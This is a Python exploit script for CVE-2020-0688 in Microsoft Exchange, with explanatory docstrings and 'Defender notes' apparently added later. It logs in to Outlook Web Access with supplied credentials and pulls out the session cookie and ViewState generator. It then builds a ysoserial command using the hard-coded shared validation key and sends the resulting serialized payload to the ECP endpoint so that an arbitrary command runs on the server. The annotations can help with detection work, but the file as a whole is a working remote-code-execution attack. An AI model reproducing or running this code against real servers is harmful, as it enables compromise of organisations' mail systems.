CVE-2020-0688.py
#coding:utf-8
#author:Jumbo
import readline
import requests
import re
import sys
import urllib3
# Turns off urllib3's warning output. Every request in this file is sent with
# verify=False (no TLS certificate validation), which would otherwise produce
# an InsecureRequestWarning per request.
urllib3.disable_warnings()
from urllib.parse import quote
def Exp(url,ASP_NET_SessionId,generator_result,command):
    """Print a ysoserial.exe command line, read the pasted payload, and send it.

    The function does not build the ViewState itself: it prints a
    ``ysoserial.exe`` invocation, waits for the operator to paste that tool's
    output, percent-encodes it and issues a single GET to ``/ecp/default.aspx``
    on ``url`` through the module-level session ``s``.

    Args:
        url: Host part of the target URL (no scheme).
        ASP_NET_SessionId: Session cookie value, passed to ysoserial as
            ``--viewstateuserkey``.
        generator_result: ``__VIEWSTATEGENERATOR`` value, used both in the
            printed command and in the request's query string.
        command: Command string placed after ``-c`` in the printed command.

    Defender notes: the request this produces is a GET to
    ``/ecp/default.aspx`` whose query string carries
    ``__VIEWSTATEGENERATOR`` and a long ``__VIEWSTATE`` value, which is
    what web-server request logs would record. CVE-2020-0688 (the name
    of this file) is the Exchange issue in which installations shared
    one ECP validation key; Microsoft addressed it in the February 2020
    Exchange security updates.
    """
    # Validation key hard-coded by the script's author; it is the value handed
    # to ysoserial's --validationkey option below.
    static_key = 'CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF'
    command_template = 'ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "{command}" --validationalg="SHA1" --validationkey="{validationkey}" --generator="{generator_result}" --viewstateuserkey="{ASP_NET_SessionId}" --isdebug –islegacy'
    ysoserial_cmdline = command_template.format(
        command=command,
        validationkey=static_key,
        generator_result=generator_result,
        ASP_NET_SessionId=ASP_NET_SessionId,
    )
    print('please execute \n{VIEWSTATECOMMAND}'.format(VIEWSTATECOMMAND=ysoserial_cmdline))

    pasted_payload = input('please write your ysoserial generate payload: ')
    # quote()'s second positional argument is `safe`, not an encoding. Passing
    # 'utf-8' replaces the default safe set ('/'), so '/' is percent-encoded.
    encoded_payload = quote(pasted_payload, 'utf-8')

    request_url = 'https://{url}/ecp/default.aspx?__VIEWSTATEGENERATOR={generator_result}&__VIEWSTATE={fuckkk}'.format(
        url=url,
        generator_result=generator_result,
        fuckkk=encoded_payload,
    )
    print(request_url)

    # verify=False: the server certificate is not validated for this request.
    response = s.get(request_url, verify=False)
    print(response.status_code)
    print('gogogoggogoggogogogogogogogogogog')
def GetSomething():
    """Log in to OWA with the supplied account, then hand off to ``Exp``.

    Reads four positional command-line arguments (host, username, password,
    command), POSTs the credentials to ``/owa/auth.owa`` with
    ``/ecp/default.aspx`` as the post-login destination, and extracts two
    values from the response: the ``ASP.NET_SessionId`` cookie and the
    ``__VIEWSTATEGENERATOR`` hidden-field value. Both are passed to ``Exp``.

    Defender notes: the script needs a working mailbox credential, so the
    sequence visible server-side is a form login to ``/owa/auth.owa``
    followed by a request to ``/ecp/default.aspx``. The login request
    carries the fixed Firefox 73 User-Agent and the
    ``PrivateComputer=true; PBack=0`` cookie header defined below, unless
    the script has been edited.
    """
    url, username, password, command = sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4]

    destination = ''.join(('https://', url, '/ecp/default.aspx'))
    authurl = ''.join(('https://', url, '/owa/auth.owa'))
    logindata = 'destination={destination}&flags=4&forcedownlevel=0&username={username}&password={password}&passwordText=&isUtf8=1'.format(
        destination=destination,
        username=username,
        password=password,
    )
    headers = {
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
        "Upgrade-Insecure-Requests": "1",
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0",
        "Connection": "close",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate",
        "Content-Type": "application/x-www-form-urlencoded",
        "Cookie": "PrivateComputer=true; PBack=0",
    }

    # verify=False: the server certificate is not validated for the login.
    login = s.post(authurl, data=logindata, headers=headers, verify=False)

    # Session cookie issued with the login response; later used as the
    # ViewState user key in the command printed by Exp().
    ASP_NET_SessionId = login.cookies['ASP.NET_SessionId']
    if not ASP_NET_SessionId:
        print('got ASP_NET_SessionId Fail')
    else:
        print('got ASP_NET_SessionId Success')
        print(ASP_NET_SessionId)

    # Pull the __VIEWSTATEGENERATOR hidden-field value out of the response
    # body. If the lookup raises, a fixed generator value is used instead.
    generator_regex = b'VIEWSTATEGENERATOR" value="(.*?)"'
    try:
        generator_result = re.search(generator_regex, login.content).group(1).decode('utf-8')
        if not generator_result:
            print('got generator_result Fail,try default')
        else:
            print('got generator_result Success')
            print(generator_result)
    except Exception:
        generator_result = 'B97B4E27'
        print(generator_result)

    Exp(url, ASP_NET_SessionId, generator_result, command)
# One requests.Session, reached by GetSomething() and Exp() through the module
# global `s`; a Session keeps cookies, so those set by the login response are
# sent again with the later GET.
s = requests.Session()
# Runs as soon as the module is loaded: there is no `if __name__ == "__main__"`
# guard, so importing this file also performs the login and request sequence.
GetSomething()